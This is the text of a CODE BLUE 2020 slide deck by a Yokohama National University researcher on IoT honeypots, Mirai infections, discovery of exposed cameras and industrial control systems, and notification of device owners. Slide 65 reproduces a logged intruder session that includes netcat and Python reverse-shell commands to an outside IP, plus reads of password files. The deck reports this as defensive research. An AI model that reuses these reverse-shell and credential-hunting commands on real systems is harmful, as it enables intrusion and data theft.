Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

[CB20] Cleaning up the mess: discovery, monitoring, analysis, and notification of infected/insecure IoT devices by Katsunari Yoshioka

Tons of insecure IoT devices are out there and ready to be compromised to join next IoT botnet or misused in even more serious threats. Since many of them are unmanaged, the situation does not seem to improve naturally in a short term. This talk will focus on series of efforts on discovery, monitoring, analysis, and notification of these devices trying to clean up "the mess".

  • Be the first to comment

  • Be the first to like this

[CB20] Cleaning up the mess: discovery, monitoring, analysis, and notification of infected/insecure IoT devices by Katsunari Yoshioka

  1. 1. Cleaning up the mess: Discovery, monitoring, analysis, and notification of infected/insecure IoT devices サイバーデブリをどう片づけるか? ~感染/脆弱IoT機器の発見、観測、分析、通知活動の今~ Katsunari Yoshioka Yokohama National University CODE BLUE 2020 1 This work is partially supported by two projects “WarpDrive: Web-based Attack Response with Practical and Deployable Research InitiatiVE” funded by NICT and Research and Development for Expansion of Radio Wave Resources (JPJ000254) by MIC, Japan.
  2. 2. 2 Botnet & DDoS Insecure Cameras Exposed Facilities Internet-of-things is already full of mess...
  3. 3. IoT Cyber Threat Monitoring and Alerting System at YNU Passive monitoring Active Monitoring Analysis/Alert/ Data Sharing Internet of Things 連携国・企業・大学等 連携国・企業・大学等 Other organizations (Government, CERTs, ISPs, Research Institutes, Security Vendors) Feedback Alerts
  4. 4. EFFORT ONE: OBSERVING AND CLEANING UP COMPROMISED DEVICES 4
  5. 5. IoT Cyber Threat Monitoring and Alerting System at YNU Passive monitoring Active Monitoring Analysis/Alert/ Data Sharing Internet of Things 連携国・企業・大学等 連携国・企業・大学等 Other organizations (Government, CERTs, ISPs, Research Institutes, Security Vendors) Feedback Alerts
  6. 6. Our system: IoTPOT = IoT Honeypot 6 We use decoy system (honeypot) to emulate vulnerable IoT devices to monitor the attacks in depth IoTPOT Attacker’s C2 Infected devices Capture malware Capture malware Sandbox Analyze behaviors Analyze behaviors Yin Minn Pa Pa, Shogo Suzuki, Katsunari Yoshioka, Tsutomu Matsumoto, Takahiro Kasama, Christian Rossow, “IoTPOT: Analysing the Rise of IoT Compromises,” USENIX WOOT 2015
  7. 7. 0 200000 400000 600000 800000 1000000 1200000 1400000 1600000 #IP /MONTH # of accessors # of attackers 1.3M IPs/month Mirai Pandemic Mirai malware Pandemic Mirai pandemic in 2016
  8. 8. Mirai pandemic • Attacks from Over 200 countries/regions • Especially Asian and South American countries have many infected devices
  9. 9. IoT DDoS Infected devices Cache DNS at ISPs 9a3jk.cc.zmr666.com? elirjk.cc.zmr666.com? pujare.cc.zmr666.com? oiu4an.cc.zmr666.com? Auth DNS for “zmr666.com” 9a3jk.cc.zmr666.com? elirjk.cc.zmr666.com? pujare.cc.zmr666.com? oiu4an.cc.zmr666.com? Slow response No resource 1Tbps+ attack!
  10. 10. 10 Size of attacks Arbor observed Infected devices observed by IotPOT Matching period: Aug1-22, 2016 100Gbps+ The attack events were provided by Arbor Networks ASERT Japan
  11. 11. Attacked ports observed by sandbox analysis Port # # samples Port # # samples Port # #samples 23/tcp 102 7574/tcp 1 9997/tcp 1 80/tcp 3 8080/tcp 6 37215/tcp 7 81/tcp 2 8081/tcp 3 37964/tcp 1 82/tcp 2 8090/tcp 1 49152/tcp 1 443/tcp 3 8181/tcp 2 52869/tcp 2 2323/tcp 14 8443/tcp 1 5555/tcp 4 9090/tcp 1 Recently captured 100+ samples attacked 19 different ports (original Mirai attacked two to three)
  12. 12. IoT Cyber Threat Monitoring and Alerting System at YNU Passive monitoring Active Monitoring Analysis/Alert/ Data Sharing Internet of Things 連携国・企業・大学等 連携国・企業・大学等 Other organizations (Government, CERTs, ISPs, Research Institutes, Security Vendors) Feedback Alerts
  13. 13. Cleaning the infected “things” 13 Detect attacks Internet Detect attacks Walled garden At least one of your connected devices has been infected by Mirai malware and we have moved you to protected network. In order to gain full-access to the Internet, please follow the instructions below: O. Cetin, C. Gañán, L. Altena, D. Inoue, T. Kasama, K. Tamiya, Y. Tie, K. Yoshioka, M. van Eeten, "Cleaning Up the Internet of Evil Things: Real-World Evidence on ISP and Consumer Efforts to Remove Mirai," The Network and Distributed System Security Symposium (NDSS 2019), 2019 (Distinguished Paper Award).
  14. 14. Notification Experiment
  15. 15. Does it work? 15
  16. 16. App-based notification project 16 Detected attack! Your device is infected! Wide scans Telnet detected You have telnet open!
  17. 17. The WarpDrive Project 17 Install “Tachikoma” App and be secure! https://warpdrive-project.jp/
  18. 18. EFFORT TWO: DISCOVERING INSECURE DEVICES 18
  19. 19. Monitoring, analysis, alert system at YNU Passive monitoring Active Monitoring Analysis/Alert/ Data Sharing Internet of Things 連携国・企業・大学等 連携国・企業・大学等 Other organizations (Government, CERTs, ISPs, Universities, Security Vendors) Feedback Alerts
  20. 20. Overview  WebUIs of same/similar IoT devices are very similar • We cluster WebUI images obtained by network scanning 20 WebUI of the same/similar devices should form large clusters WebUI of the same/similar devices should form large clusters
  21. 21. Experiment • 14,744 image data from a certain Japanese AS –Percentage of IoT WebUIs ※by manual inspection with random sampling →35% • We call a cluster “IoT cluster” if it contains 50% or more IoT devices of the same/similar categories 21
  22. 22. Filtering noises • Filtering for the following 3 kinds of clusters –Error message pages –Blank pages –Server test/default pages 22
  23. 23. Initial clustering results 23  Showing all the clusters include singletons  A circle represents a cluster IoT cluster NOT IoT cluster
  24. 24. Clustering result 24 IoT cluster NOT IoT cluster Error message page cluster  Many “error message page” exist, and form large clusters →Exclude
  25. 25. Clustering result 25  Many “blank page ” exist, and form a large cluster →Exclude IoT cluster NOT IoT cluster Blank page cluster
  26. 26. Clustering result 26  Many “server test/default page ” exist, and form large clusters →Exclude IoT cluster NOT IoT cluster Server test/default page cluster
  27. 27. Filtering particular clusters 27  Result after excluding “server test/default page cluster”  Because 88% of singletons are common web sites ※, we also exclude them (※confirmed by random sampling) 高濃度IoTクラスタ 非IoTクラスタ IoT cluster NOT IoT cluster
  28. 28. Clustering result 28 By excluding the following clusters, it was found that the WebUI images of the IoT devices form larger clusters than common Web pages  Error message page cluster  Blank page cluster  Server test/default page cluster  Singletons 高濃度IoTクラスタ 非IoTクラスタ IoT cluster NOT IoT cluster
  29. 29. Device category 29 IP camera Router NAS NVR Remote monitoring DVR ICS Copier Security appliance Other
  30. 30. Discovered IoT devices • We found 154 models of IoT devices in single AS 30 8.4% 9.7% 11.0% 14.3% 40.9% 3.9% 3.9% 1.3% 1.3% 5.2% IP camera Router NAS NVR Remote monitoring DVR ICS Copier Security appliance Other IP Cameras! IP Cameras!
  31. 31. EFFORT TRHEE: UNDERSTANDING THE RISK OF INSECURE/EXPOSED CAMERAS 31
  32. 32. Monitoring, analysis, alert system at YNU Passive monitoring Active Monitoring Analysis/Alert/ Data Sharing Internet of Things 連携国・企業・大学等 連携国・企業・大学等 Other organizations (Government, CERTs, ISPs, Universities, Security Vendors) Feedback Alerts
  33. 33. Experiment of decoy IP camera exposing bait URL and ID/password Decoy IP Camera exposing bait credential Peeping observation experiment with two kinds of decoy IP Cameras monitoring a room for observation imitating a living room at home 33 Decoy IP Camera monitoring “living room”
  34. 34. Sharp increase in the number of hosts Sharp increase in the number of hosts Access to honey camera 34 Number of hosts that access the honey camera Camera A Camera B
  35. 35. • Massive requests via insecam were observed • Honey camera was registered to insecam The honey camera was on Insecam… GET /xxxxxxx/xxxxx?resolution=640&quality=1& Language=0&COUNTER HTTP/1.1 Referer: http://www.insecam.org/en/bycountry/JP/?page=4 Peeps jumped to more than 20,000 times per day after the registration to Insecam 35
  36. 36. Do they actually use credentials? 1. Peeping 2. Access URL 3. Enter ID / Password 36
  37. 37. Access to the URL with bait credentials • Observed access to the bait URL from 422 IP addresses • 217 IP address entered ID / password displayed on camera A Host that sent the request Acess host using domain of URL Login challenge host Host that entered ID/password displayed on camera A 583 422 235 217 Humans are watching images of cameras Some peepers go “beyond peeping” (login challenge) 37
  38. 38. The “living room” We prepared a room that looks like a living room and observed peeping behaviors. 38
  39. 39. • Several accessors keep peeping for days.. The long peep 39 Date and time Duration IP address 2017-10-08_12-54-28 9:58 182.251.255.4 2017-10-08_13-04-28 0:10~1:47 182.251.255.4 2017-10-08_20-54-50 4:08~9:45 182.251.255.7 2017-10-08_21-04-50 0:14~1:35 182.251.255.7 2017-10-08_21-14-50 8:39 182.251.255.7 2017-10-08_21-24-50 0:10~1:40 182.251.255.7 2017-10-08_23-44-57 2:13~2:40 106.159.126.87 2017-10-09_01-25-03 1:22~1:45 106.159.126.87 2017-10-09_01-55-04 4:38 106.159.126.87 2017-10-09_04-25-10 1:06~1:44 106.159.126.87 2017-10-09_07-55-21 2:45~4:25 106.159.126.87 2017-10-09_11-35-47 7:23~8:08 106.159.126.87 2017-10-09_12-34-54 9:06 106.159.126.87 2017-10-09_19-36-11 5:23~5:35 182.251.255.16 Frequent IP changes due to mobile access
  40. 40. Access to honey camera Host that sent the request Login host Peeping host Changing angles Zoom in/out A 1755 33 8 C 1998 66 18 D 1806 13 1 E 1749 4 F 876 51 32 6 40
  41. 41. Changing angles/zooming in out 41
  42. 42. Automated discovery and image acquisition for multiple cameras GET /cgi-bin/xxxxx?resolution=640& quality=1&Language=0&COUNTER GET /xxxxJPG?COUNTER GET /cgi-bin/xxxxxxx.cgi?chn=0& u=admin&p=&q=0&COUNTER GET /mjpg/xxxxxx.mjpg?COUNTER GET /xxxxxxxximage1?COUNTER We observed automated requests collecting images from multiple IP cameras A request to acquire an image of IP camera A A request to acquire an image of an IP camera of others model A request to acquire an image of IP camera E 42
  43. 43. Continuous and “efficient” peeping 10/14 01:13:40 10/17 00:44:08 10/14 01:15:16 1m36s 52s 10/14 01:16:08 3m17s 10/14 01:19:25 14s 10/14 01:19:39 1. Automated search for cameras GET /xxxxxx.cgi?user=yyyy&pwd=yyyyy 2. Automated search for cameras GET /cgi-bin/xxxxxx 3. Manual peep using browser (access by human) GET /cgi-bin/xxxx?resolution=1280x960&quality=1 &page=yyy&Language=z 4. Image acquisition of camera A using tool GET /xxxxxxxxJPEG , GET /cgi-bin/xxxxxx 5. Continuous and automated acquisition of images GET /cgi-bin/xxxxxx?fake=yyyy 42h Combination of automated accesses by camera scanner and auto image capture and manual browsers access (by human) are observed 43
  44. 44. Peeping with vulnerability exploitation(Camera F) • Camera F vulnerability –ID / password can be acquired without authentication by specific request • Observed access flow(4 IP address) 1.Get ID / password illegally 2. Peep with the acquired ID/password 44 We informed these results to multiple camera vendors
  45. 45. EFFORT FOUR: UNDERSTANDING THE RISK OF INSECURE/EXPOSED FACILITIES 45
  46. 46. Discovered IoT devices • We found 154 models of IoT devices in single AS 46 8.4% 9.7% 11.0% 14.3% 40.9% 3.9% 3.9% 1.3% 1.3% 5.2% IP camera Rouer NAS NVR Remote monitoring DVR ICS Copier Security appliance Other
  47. 47. Waterworks Monitoring System Case:
  48. 48. River Gate Example Case:
  49. 49. Raspberry Pi Telnet service (simulation) Raspberry Pi Internal network (simulation) PC (Access controller) switch Reverse proxy 80/tcp iptables 502/tcp Data logger specific port PLC specific port Data logger PLC Internet 23/tcp Telnet proxy Honeypot of remote monitoring system • We build the honeypot using real PLC and data logger 49
  50. 50. WebUI –Facility name/Current time 50 Fictitious facility name (Japanese and English) Manufacturer name Manufacturer name Image of Data logger Model number of Data logger
  51. 51. WebUI – Log of Sensor Data 51 Maker name Maker name Fictitious facility name (Japanese and English) Fictitious facility name (Japanese and English) Manufacturer name
  52. 52. WebUI –ON/OFF buttons 52 The confirmation dialog is displayed when the control button is pushed Fictitious facility name (Japanese and English) Manufacturer name
  53. 53. WebUI –Modifying Values 53 When the button is pushed, the input form is displayed and accessors can enter the setting value Fictitious facility name (Japanese and English) Manufacturer name
  54. 54. Access to honeypot WebUI(manual) 54 Number of accessors New Comer Repeater Observation start date First manual accessor after 12 hours from observation start Since it was behaving lie a full-browser, it was erroneously determined as manual access September October November
  55. 55. Duration of each manual access on webUI Workshop in Hakone 55 Duration(days) 1 1 1 1 2 121 Number of accessors Persistent accesses
  56. 56. Critical control operations on webUI Workshop in Hakone 56 Number of accessors 115 3 1 4 1 2 Time of control operations Aggressive remote operation
  57. 57. Source of manual accesses 57 Ukraine 3件の Tor Exit-node 3 Tor Exit-nodes 18 11 10 US Brazil UK Spain Germany Japan Russia Canada China
  58. 58. “Careful” visitor 9/28 (Total:32m6s) • Access 3 honeypots (A,B,C) • Do page transitions in A,B、Browse only top page in C 10/01 (Total:2h) There is a blank time • Access 3 honeypots (A,B,C) • Browse only Top page in B,C、Do page transitions in A 58 10/24 (Total:41m) • Access 2 honeypots (A,C) • Do page transitions in both honeypots 11/23 (Total:17h) There is a blank time • Access 1 honeypot (A) • Browse Top page. After 15 hours, do page transitions - Use 3 IP addresses - Do not perform control operations - A minimum page transitions
  59. 59. “Aggressive” visitor 01:23:27 • Browse Top page 01:33:48 • Browse setting value change page 01:34:23 01:34:33 • Change a set value(Lightning power: 98.000→20.000) 01:35:43 • Change a set value(Air-conditioning power:100.000→50.000) 01:36:11 • Browse ON/OFF page 59 01:36:35 • Lightning power:OFF→OFF 01:36:52 • Air-conditioning power: OFF→ON 01:37:09 • PLC:OFF→ON 01:37:27 • Browse reset buttons page and setting value change page 02:06:48 • Change a set value(Lightning power:98.000→95.000) - Use 1 IP address - Some critical operations
  60. 60. “Rich” visitor 60 00:04:01 • TOP page 00:04:30 • Browse event page 00:04:56 ~ 01:58:27 • Access 1 honeypot using the Web application security scanner tool (It is a professional tool that costs annual charge of 5000~8000USD) We informed about these observation to MIC
  61. 61. Do the web contents of critical infra attract visitors? #visitors per IP per Day Average # commands Average duration of visit [s] Remote monitoring WebUI with Facility name and Device image 0.112 6.01 400 Remote monitoring WebUI with Device image but no facility name 0.025 2.08 134 Remote monitoring WebUI with no device image and no facility name 0.049 3.04 178 Simple Login Page 0.015 N/A 5.4
  62. 62. Post on hacking forum attracts attackers and security experts 62 Date Event 2018/08/31 Launch of honeypot 2019/12/08 New thread on the honeypot facility in hacking forum 2019/12/09 # Attacks jumps up (login challenges increased) Notification from security vendor 2019/12/10 Notification from anonymous expert 2019/12/17 Notification from JPCERT/CC # visitors
  63. 63. Observing deeper intrusion 63
  64. 64. Observing deeper intrusion 64 Honeypot Web UI (intentionally) exposes admin credentials (which happens in the wild.) tel login: Login by using admin credentials obtained from WebUI Li9-admin Password: 3k54*2?r adm@li9% ifconfig eth0 Link encap… eth1 Link encap.. Access WebUI lateral movement Admin Telnet User: Li9-admin Pass: 3k54*2?r
  65. 65. An example of deep intruder mg@li8~ $ ls -al mg@li8~ $ cd .ssh mg@li8~/.ssh $ ls -al mg@li8~/.ssh $ nc xx.xx.231.63 7414 -e /bin/bash mg@li8~/.ssh $ python -c 'import pty; pty.spawn("/bin/bash")' mg@li8~/.ssh $ mg@li8~/.ssh $ ls mg@li8~/.ssh $ cd .. mg@li8~ $ sudo -l mg@li8~ $ pwd mg@li8~ $ ls -al mg@li8~ $ cat list.txt mg@li8~ $ mg@li8~ $ uname -a mg@li8~ $ cat /etc/passwd mg@li8~ $ id mg@li8~ $ mg@li8~ $ mg@li8~ $ cat list.txt mg@li8~ $ ls -al mg@li8~ $ cd manual mg@li8~/manual $ ls -al mg@li8~/manual $ cd /var mg@li8/var $ ls -al mg@li8/var $ cd backups mg@li8/var/backups $ ls -al mg@li8/var/backups $ cd .. mg@li8/var $ ls -al mg@li8/var $ ls -al mg@li8/var $ file sqp mg@li8/var $ file swap mg@li8/var $ cd .. mg@li8/ $ ls -al mg@li8/ $ cd home mg@li8/home $ ls -al mg@li8/home $ cd dl8 mg@li8/home/dl8 $ ls -al mg@li8/home/dl8 $ cd Desktop mg@li8/home/dl8/Desktop $ ls -al mg@li8/home/dl8/Desktop $ cd .. mg@li8/home/dl8 $ cd Documents mg@li8/home/dl8/Documents $ ls -al mg@li8/home/dl8/Documents $ cd .. mg@li8/home/dl8 $ mg@li8/home/dl8 $ cd Download mg@li8/home/dl8 $ cd Downloads mg@li8/home/dl8/Downloads $ ls -al mg@li8/home/dl8/Downloads $ cd .. mg@li8/home/dl8 $ cd oldconffiles mg@li8/home/dl8/oldconffiles $ ls -al mg@li8/home/dl8/oldconffiles $ cd .config mg@li8/home/dl8/oldconffiles/.config $ ls -a mg@li8/home/dl8/oldconffiles/.config $ cat Trolltech.conf mg@li8/home/dl8/oldconffiles/.config $ ls -al mg@li8/home/dl8/oldconffiles/.config $ cd openbox mg@li8/home/dl8/oldconffiles/.config/openbox $ ls -al mg@li8/home/dl8/oldconffiles/.config/openbox $ cd .. mg@li8/home/dl8/oldconffiles/.config $ cd pcmanfm mg@li8/home/dl8/oldconffiles/.config/pcmanfm $ ls -al mg@li8/home/dl8/oldconffiles/.config/pcmanfm $ cd .. mg@li8/home/dl8/oldconffiles/.config $ cd .. mg@li8/home/dl8/oldconffiles $ ls -al mg@li8/home/dl8/oldconffiles $ cd .themes mg@li8/home/dl8/oldconffiles/.themes $ ls -al mg@li8/home/dl8/oldconffiles/.themes $ cd PiX mg@li8/home/dl8/oldconffiles/.themes/PiX $ ls -al mg@li8/home/dl8/oldconffiles/.themes/PiX $ cd .. mg@li8/home/dl8/oldconffiles/.themes $ cd .. mg@li8/home/dl8/oldconffiles $ ls -al mg@li8/home/dl8/oldconffiles $ cd .. mg@li8/home/dl8 $ ls -al mg@li8/home/dl8 $ cd Videos mg@li8/home/dl8/Videos $ ls -al mg@li8/home/dl8/Videos $ cd .. mg@li8/home/dl8 $ ls -al mg@li8/home/dl8 $ cd python_games mg@li8/home/dl8/python_games $ ls -al mg@li8/home/dl8/python_games $ cd .. mg@li8/home/dl8 $ cd pcap mg@li8/home/dl8/pcap $ ls -al mg@li8/home/dl8/pcap $ mg@li8/home/dl8/pcap $ ip a mg@li8/home/dl8/pcap $ ./run_tcpdump.sh mg@li8/home/dl8/pcap $ grep -rnw '/' -ie 'password' --color=always mg@li8~ $ id mg@li8~ $ su dl8 mg@li8~ $ su dl8 mg@li8~ $ ls -al mg@li8/var/mail $ cd .. mg@li8/var $ ls -al mg@li8/var $ cd opt mg@li8/var/opt $ ls -al mg@li8/var/opt $ cd .. mg@li8/var $ cd log mg@li8/var/log $ ls -al mg@li8/var/log $ id mg@li8/var/log $ ps aux mg@li8/var/log $ cd .. mg@li8/var $ ls -al mg@li8/var $ cd .. mg@li8/ $ ls -al mg@li8/ $ cd bin mg@li8/bin $ ls -al mg@li8/bin $ netstat mg@li8/bin $ netsat -plnt mg@li8/bin $ netsat -plnt mg@li8~ $ <pre>python -c &apos;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STR EAM);s.connect((&quot;75.39.231.63&fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;- i&quot;]);&apos;</pre> mg@li8~ $ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STR EAM);s.connect(("75.39.231.63",7414));os.dup2(s.fileno(),2);p=subpro cess.call(["/bin/sh","-i"]);' mg@li8~ $ ls -al mg@li8~ $ mg@li8~ $ cd manual mg@li8~/manual $ ls -al mg@li8~/manual $ cd .. mg@li8~ $ ls -al mg@li8~ $ cd .. mg@li8/home $ cd ..sh mg@li8/home $ cd .. mg@li8/ $ ls -al mg@li8/ $ cd root mg@li8/ $ cd etc mg@li8/etc $ ls -al mg@li8/etc $ mg@li8/etc $ ps aux mg@li8/etc $ mg@li8/etc $ netstat -plnt mg@li8/etc $ netstat mg@li8/etc $ mg@li8/etc $ cd ssh mg@li8/etc/ssh $ ls -al mg@li8/etc/ssh $ cat ssh_config mg@li8/etc/ssh $ cat sshd_config mg@li8/etc/ssh $ nc mg@li8/etc/ssh $ nc 75. mg@li8/etc/ssh $ nc xx.xx.63 741 mg@li8/etc/ssh $ mg@li8/etc/ssh $ mg@li8/etc/ssh $ cd / mg@li8/ $ ls -al • Sent 10 times as many commands as ordinally human visitors to telnet honeypot, implying strong interest on the system. • Checks for the device and network configurations, tried several privilege escalation and tool downloads • Fast typing and decision making, use of one-line commands implying relatively high skill in Linux system • Checking device operators command history, accessing document files (operators note for plants network topology).
  66. 66. 66 Investigation by the government (2017) Ministry of Internal Affairs and Communications / ICT-ISAC / Yokohama National University System Owners Operators System Integrators Investigators Device Manufacturers 1. Scan for insecure IIoT systems and identify manufacturers and owners 2. Notify manufacturers and owners 3. Notify system integrators and fix related systems
  67. 67. Summary of investigation results (published by MIC) • Discovered vulnerable devices: 150 • Device users can be inferred:77 • Notified and fixed:36 • We could not find any of these information on Shodan/Censys because: – Ports not scanned – Redirects/JavaScript not handled – multi-byte characters (Japanese) not supported 67 New notification project just launched from Aug 2020. ML-assisted investigation would enable efficient discovery of insecure devices
  68. 68. • People are not yet aware of the risk of connecting “things” to the world and thus creating the big “mess”. • Combination of active and passive monitoring helps understanding the critical situation. • The government/ISP/researchers put much efforts on notifying the users of infected/insecure devices to clean up the mess. Summary 68
  69. 69. Thank you! Katsunari Yoshioka, Ph.D Yokohama National University yoshioka@ynu.ac.jp For more, please visit: IoTPOT – Analysing the Rise of IoT Compromises, Yokohama National University http://ipsr.ynu.ac.jp/iot/ References: Rui Tanabe, Tatsuya Tamai, Akira Fujita, Ryoichi Isawa, Katsunari Yoshioka, Tsutomu Matsumoto, Carlos Ganan and Michel Van Eeten, "Disposable Botnets: Examining the Anatomy of IoT Botnet Infrastructure," Proc. International Conference on Availability, Reliability, and Security (ARES2020), 2020. O. Cetin, C. Ganan, L. Altena, D. Inoue, T. Kasama, K. Tamiya, Y. Tie, K. Yoshioka, M. van Eeten, "Cleaning Up the Internet of Evil Things: Real-World Evidence on ISP and Consumer Efforts to Remove Mirai," The Network and Distributed System Security Symposium (NDSS 2019), 2019. Yin Minn Pa Pa, Suzuki Shogo, Katsunari Yoshioka, Tsutomu Matsumoto, Takahiro Kasama, Christian Rossow "IoTPOT: A Novel Honeypot for Revealing Current IoT Threats," Journal of Information Processing, Vol. 57, No. 4, 2016. Yin Minn Pa Pa, Shogo Suzuki, Katsunari Yoshioka, and Tsutomu Matsumoto, Takahiro Kasama, Christian Rossow, "IoTPOT: Analysing the Rise of IoT Compromises," 9th USENIX Workshop on Offensive Technologies (USENIX WOOT 2015), 2015. 69

×